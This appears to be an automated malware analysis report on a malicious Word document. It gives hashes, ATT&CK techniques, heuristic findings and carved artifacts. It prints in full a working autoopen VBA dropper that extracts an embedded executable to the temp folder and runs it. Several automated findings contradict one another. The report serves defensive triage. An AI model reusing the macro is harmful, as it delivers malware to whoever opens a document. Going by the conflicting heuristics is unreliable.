Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c812046e38358fa3…

MALICIOUS

Office (OLE)

Size: 484.6 KB
Created: 2018-02-05 22:35:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 279a0160a0ba051a65437bd9aa4f7d46
SHA-1: eb54507e145508ee87c31d998d041a78f0532f2a
SHA-256: c812046e38358fa3be9878283c9794d59e8d0babb44ee332654b6439bf03fa1a
Risk Score: 630

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer

The sample is a Microsoft Word document that exploits CVE-2008-2244 to embed and execute a PE executable. The VBA macro 'autoopen' uses CreateObject to write the embedded executable to %TEMP%\s.exe and then executes it. This indicates dropper functionality, aiming to download and run a second-stage payload.

Heuristics (18)

  • CVE-2008-2244 — Microsoft Word record-parsing payload (critical; CVE likely) [CVE_2008_2244]
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Doc.Dropper.Agent-6583517-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6583517-0
  • Embedded PE executable (critical) [OLE_EMBEDDED_EXE]
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched line in script:
    Sub autoopen()
    Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
    End Sub
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Sub autoopen()
    Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
    End Sub
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "NewMacros"
    Sub autoopen()
    Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
  • Heap-spray pattern detected (high) [SC_HEAP_SPRAY]
    Repeated 0x04 bytes found
    Disassembly: attempted x86 opcode disassembly of the region
  • Reference to ShellExecute API (high) [SC_STR_SHELLEXEC]
    Reference to ShellExecute API
  • Reference to LoadLibrary API (high) [SC_STR_LOADLIBRARY]
    Reference to LoadLibrary API
  • Reference to GetProcAddress API (high) [SC_STR_GETPROCADDRESS]
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]
    OLE file is 496,216 bytes but its declared streams total only 23,772 bytes — 472,444 bytes (95%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API (medium) [SC_STR_VIRTUALALLOC]
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present (medium) [OLE_XLM_AUTOOPEN]
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact (medium) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 871 bytes
SHA-256: affa10d5c5e9b9feee09574938f08b2adc8fa3df7040a7ea7bea91e85bb29aaa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub autoopen()
    ' Read the document's own bytes and carve the trailing 468,056 bytes (4 * 117014) into a()
    Set f = CreateObject("scripting.filesystemobject")
    Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)
    Dim a(4 * 117014 - 1) As Byte
    s = e.Size - UBound(a) - 1    ' payload start = file size - payload size (0x6E00 for this 496,216-byte file)
    Dim b(1375733) As Byte
    Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7
    Get #7, 1, b: Close #7
    For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next
    ' Write the carved PE to s.exe in the temp folder (special folder 2) and launch it
    Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1
    Put #1, 1, a: Close #1
    Shell (f.getspecialfolder(2) + "\\s.exe")
End Sub
Filename: embedded_office_00006e00.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x6E00
Size: 468056 bytes
SHA-256: cd7f725fe6d9edfa24e26e12b558e81854d77211fedf1dd9075669896f5077b1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY.
Static shellcode analysis recovered API/import strings: VirtualAlloc, ExitProcess, LoadLibraryA, CreateFileA, GetProcAddress, ShellExecuteA.